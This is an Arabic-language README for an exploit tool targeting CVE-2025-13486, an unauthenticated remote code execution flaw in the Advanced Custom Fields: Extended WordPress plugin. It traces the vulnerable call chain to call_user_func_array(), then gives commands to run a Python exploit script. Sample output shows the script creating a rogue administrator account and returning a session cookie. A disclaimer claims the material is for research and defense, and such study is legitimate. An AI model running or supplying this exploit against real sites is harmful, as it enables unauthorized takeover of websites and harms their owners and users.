
CVE-2025-13486 - استغلال تنفيذ التعليمات البرمجية عن بُعد وتصعيد الامتيازات
استغلال CVE-2025-13486 اكتشفه Marcin Dudek (dudekmar)
هذا المستودع مُقدَّم لأغراض البحث والأمن الدفاعي فقط. لا يتحمل المؤلف أي مسؤولية عن إساءة استخدام هذه المعلومات.
إضافة Advanced Custom Fields: Extended (ACFE) لـ WordPress معرضة لثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE) في الإصدارات من 0.9.0.5 إلى 0.9.1.1.
توجد الثغرة في الدالة prepare_form()، التي تقبل مدخلات يتحكم فيها المستخدم وتمررها إلى call_user_func_array() دون تحقق مناسب.
يسمح ذلك للمهاجمين غير المصادق عليهم بتنفيذ أكواد PHP عشوائية على الخادم بشكل محدود، ومع ذلك فهو كافٍ لإنشاء حساب مسؤول وتسجيل الدخول.
سلسلة الثغرة كالتالي:
includes/modules/form/module-form-front.php:24 -> يؤدي إجراء wp_ajax_nopriv_acfe/form/render_form_ajax إلى تشغيل معالج render_form_ajax.
includes/modules/form/module-form-front.php:492 -> يتم تطبيق الفلتر acfe/form/prepare_form، مما يستدعي الدالة prepare_form().
includes/modules/form/module-form-front-render.php:151 -> يتم تمرير بيانات $form التي يتحكم فيها المستخدم مباشرة إلى call_user_func_array().
ثبّت تبعيات بايثون:
python3 -m venv venv
venv/bin/pip install -r requirements.txt
حدّد هدف WordPress معرضًا للثغرة.
يجب أن يحتوي الهدف على صفحة بها نموذج مولّد بواسطة ACFE.
venv/bin/python3 CVE-2025-13486.py -t http://127.0.0.1:8000/\?page_id=2
مثال على المخرجات:
[2025-12-19] [11:00:46] [success] ACFE version is vulnerable: 0.9.1.1
[2025-12-19] [11:03:30] [info] Use `--exploit` to perform exploitation.
أعد تشغيل البرنامج النصي مع استخدام الخيار --exploit:
venv/bin/python3 CVE-2025-13486.py -t http://127.0.0.1:8000/\?page_id=2 --exploit
مثال على المخرجات:
[2025-12-19] [11:00:13] [success] ACFE version is vulnerable: 0.9.1.1
[2025-12-19] [11:00:13] [success] ACFE nonce found: c5d75e0d16
[2025-12-19] [11:00:14] [success] Account created: adm1n:2c5c87a94a2c5c87a94a (administrator)
[2025-12-19] [11:00:14] [success] Authentication succeded!
[2025-12-19] [11:00:14] [info] Cookie: wordpress_4411def9d576984c8d78253236b2a62f=adm1n%7C1766311214%7CwVDbFsbQpjYMM6ckgEQ6gwr6dcjIRhmqYed7Y46YqHJ%7C2f7857614d5ebe1216922dab79c3a8be7164cccde0869e1545f3bfb17c5d2859
استخدم كوكي المصادقة الذي أعاده WordPress لتسجيل الدخول عبر حساب المسؤول الذي تم إنشاؤه حديثًا.